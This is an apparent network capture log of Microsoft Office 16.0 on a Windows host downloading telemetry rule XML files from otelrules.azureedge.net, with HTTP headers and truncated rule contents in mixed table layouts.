Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:33 UTC | 192 | OUT | GET /rules/rule120680v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:33 UTC | 584 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:33 GMT
Content-Type: text/xml
Content-Length: 1952
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
ETag: "0x8DC582B956B0F3D"
x-ms-request-id: ba33cc4f-e01e-0052-2e6f-28d9df000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181233Z-r1755647c66kcsqh9hy6eyp6kw00000003k000000000d27m
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-28 18:12:33 UTC | 1952 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


Session ID | Source IP | Source Port | Destination IP | Destination Port
80 | 192.168.2.4 | 49832 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:33 UTC | 192 | OUT | GET /rules/rule120679v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:33 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:33 GMT
Content-Type: text/xml
Content-Length: 174
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
ETag: "0x8DC582B91D80E15"
x-ms-request-id: 071448c9-d01e-0028-2702-297896000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181233Z-r1755647c66x2fg5vpbex0bd8400000006v000000000700b
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:33 UTC | 174 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


Session ID | Source IP | Source Port | Destination IP | Destination Port
81 | 192.168.2.4 | 49834 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:33 UTC | 192 | OUT | GET /rules/rule120681v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:33 UTC | 491 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:33 GMT
Content-Type: text/xml
Content-Length: 958
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
ETag: "0x8DC582BA0A31B3B"
x-ms-request-id: c6fd9367-401e-008c-7f80-2686c2000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181233Z-r1755647c66mmrln9nsykf75u800000004e000000000bvd5
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:33 UTC | 958 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


Session ID | Source IP | Source Port | Destination IP | Destination Port
82 | 192.168.2.4 | 49835 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:33 UTC | 192 | OUT | GET /rules/rule120682v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:33 UTC | 491 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:33 GMT
Content-Type: text/xml
Content-Length: 501
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
ETag: "0x8DC582BACFDAACD"
x-ms-request-id: 170621ef-f01e-003f-351f-28d19d000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181233Z-17fbfdc98bblzxqcphe71tp4qw00000000ug00000000331x
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:33 UTC | 501 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            83 | 192.168.2.4 | 49836 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:33 UTC | 193 | OUT | GET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:33 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:33 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 2592
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                            ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                            x-ms-request-id: c21b0bdf-c01e-008e-186f-287381000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181233Z-17fbfdc98bbp77nqf5g2c5aavs00000004zg00000000cbh4
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:33 UTC | 2592 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            84 | 192.168.2.4 | 49837 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:33 UTC | 192 | OUT | GET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:34 UTC | 584 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:34 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 3342
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                            ETag: "0x8DC582B927E47E9"
                                                                                                                                                                            x-ms-request-id: d72005e7-a01e-0002-1a61-285074000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181234Z-r1755647c66vxbtprd2g591tyg000000053g0000000039z9
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:34 UTC | 3342 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            85 | 192.168.2.4 | 49839 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:34 UTC | 192 | OUT | GET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:34 UTC | 584 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:34 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1393
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                            ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                            x-ms-request-id: f473ee8a-401e-00ac-6cf0-260a97000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181234Z-17fbfdc98bbwj6cp6df5812g4s00000006ug00000000eybb
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:34 UTC | 1393 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            86 | 192.168.2.4 | 49840 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:34 UTC | 192 | OUT | GET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:34 UTC | 584 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:34 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1356
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                            ETag: "0x8DC582BDC681E17"
                                                                                                                                                                            x-ms-request-id: 19a18c92-701e-0098-0fb0-26395f000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181234Z-r1755647c66kcsqh9hy6eyp6kw00000003gg00000000gypf
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:34 UTC | 1356 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            87 | 192.168.2.4 | 49838 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:34 UTC | 193 | OUT | GET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:34 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:34 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 2284
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                            ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                            x-ms-request-id: 1515cbe5-b01e-0084-6467-28d736000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181234Z-17fbfdc98bb5d4fn785en176rg00000005g0000000002dzc
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:34 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


Session ID: 88, Source IP: 192.168.2.4, Source Port: 49841, Destination IP: 13.107.253.45, Destination Port: 443
Timestamp: 2024-10-28 18:12:34 UTC, Bytes transferred: 192, Direction: OUT, Data:
GET /rules/rule700201v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
Timestamp: 2024-10-28 18:12:34 UTC, Bytes transferred: 563, Direction: IN, Data:
HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:34 GMT
Content-Type: text/xml
Content-Length: 1393
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
ETag: "0x8DC582BE39DFC9B"
x-ms-request-id: 0243abe0-001e-0028-29fb-25c49f000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181234Z-r1755647c66ss75qkr31zpy1kc0000000550000000000be2
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
Timestamp: 2024-10-28 18:12:34 UTC, Bytes transferred: 1393, Direction: IN, Data:
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


Session ID: 89, Source IP: 192.168.2.4, Source Port: 49842, Destination IP: 13.107.253.45, Destination Port: 443
Timestamp: 2024-10-28 18:12:34 UTC, Bytes transferred: 192, Direction: OUT, Data:
GET /rules/rule700200v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
Timestamp: 2024-10-28 18:12:35 UTC, Bytes transferred: 584, Direction: IN, Data:
HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:34 GMT
Content-Type: text/xml
Content-Length: 1356
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
ETag: "0x8DC582BDF66E42D"
x-ms-request-id: 2e99a458-901e-0067-29ae-26b5cb000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181234Z-17fbfdc98bb7jfvg3dxcbz5xm000000003m000000000fr7a
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
Timestamp: 2024-10-28 18:12:35 UTC, Bytes transferred: 1356, Direction: IN, Data:
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


Session ID: 90, Source IP: 192.168.2.4, Source Port: 49844, Destination IP: 13.107.253.45, Destination Port: 443
Timestamp: 2024-10-28 18:12:34 UTC, Bytes transferred: 192, Direction: OUT, Data:
GET /rules/rule702350v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
Timestamp: 2024-10-28 18:12:35 UTC, Bytes transferred: 584, Direction: IN, Data:
HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:35 GMT
Content-Type: text/xml
Content-Length: 1358
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
ETag: "0x8DC582BE6431446"
x-ms-request-id: 3a0fb8a5-701e-0050-6930-276767000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181235Z-17fbfdc98bb6vp4m3kc0kte9cs0000000670000000004gue
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
Timestamp: 2024-10-28 18:12:35 UTC, Bytes transferred: 1358, Direction: IN, Data:
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


Session ID: 91, Source IP: 192.168.2.4, Source Port: 49843, Destination IP: 13.107.253.45, Destination Port: 443
Timestamp: 2024-10-28 18:12:34 UTC, Bytes transferred: 192, Direction: OUT, Data:
GET /rules/rule702351v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
Timestamp: 2024-10-28 18:12:35 UTC, Bytes transferred: 584, Direction: IN, Data:
HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:35 GMT
Content-Type: text/xml
Content-Length: 1395
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
ETag: "0x8DC582BE017CAD3"
x-ms-request-id: d866d412-001e-0028-1c9c-27c49f000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181235Z-17fbfdc98bbp77nqf5g2c5aavs00000004y000000000g0tu
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
Timestamp: 2024-10-28 18:12:35 UTC, Bytes transferred: 1395, Direction: IN, Data:
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            92 | 192.168.2.4 | 49845 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:35 UTC | 192 | OUT | GET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:35 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:35 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1395
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                            ETag: "0x8DC582BDE12A98D"
                                                                                                                                                                            x-ms-request-id: eb17c832-b01e-0097-1249-274f33000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181235Z-r1755647c66t77qv3m6k1gb3zw0000000550000000000bdg
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:35 UTC | 1395 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            93 | 192.168.2.4 | 49846 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:35 UTC | 192 | OUT | GET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:35 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:35 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1358
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                            ETag: "0x8DC582BE022ECC5"
                                                                                                                                                                            x-ms-request-id: 255ed8c5-301e-0051-461c-2738bb000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181235Z-17fbfdc98bb2cvg4m0cmab3ecw000000046g000000001tmp
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:35 UTC | 1358 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            94 | 192.168.2.4 | 49847 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:35 UTC | 192 | OUT | GET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:35 UTC | 584 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:35 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1389
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                            ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                                            x-ms-request-id: cdbfd92d-501e-0029-317f-27d0b8000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181235Z-r1755647c66f4bf880huw27dwc00000006p000000000gv2k
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:35 UTC | 1389 | IN
